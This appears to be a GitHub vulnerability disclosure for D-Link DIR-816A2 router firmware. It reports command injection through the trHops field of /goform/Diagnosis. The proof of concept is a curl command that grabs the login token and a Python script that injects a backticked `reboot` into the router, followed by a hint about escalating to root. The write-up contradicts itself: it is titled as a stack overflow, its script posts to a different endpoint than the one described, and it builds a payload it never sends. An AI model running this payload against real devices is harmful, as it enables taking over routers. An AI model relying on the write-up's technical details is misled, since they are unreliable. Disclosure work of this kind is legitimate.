Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

DIR-816A2_FWv1.10CNB05_R1B011D88210.img Stack overflow vulnerability

Overview

Affected version

Below is the latest firmware

Vulnerability details

Vulnerability occurs in /goform/Diagnosis. When doType is 9 and pingAddr isn't 0.0.0.0, trHops will be spliced into v10 by snprintf, and finally system will be executed, resulting in a command injection vulnerability

Vulnerability verify

POC

Gets the token ID

curl http://192.168.0.1/dir_login.asp | grep tokenid

Run poc

import requests


tokenid = ''

url = 'http://192.168.0.1/goform/form2Dhcpip.cgi'

payload = b'a' * 10000

data = {
    'tokenid': tokenid,
    'pingAddr': '192.168.0.1',
    'doType': '9',
    'trHops': '`reboot`'
}

print('payload sending...')
r = requests.post(url, data)
print('end')

You can see that the router restarts, and finally you can write an exp to get root.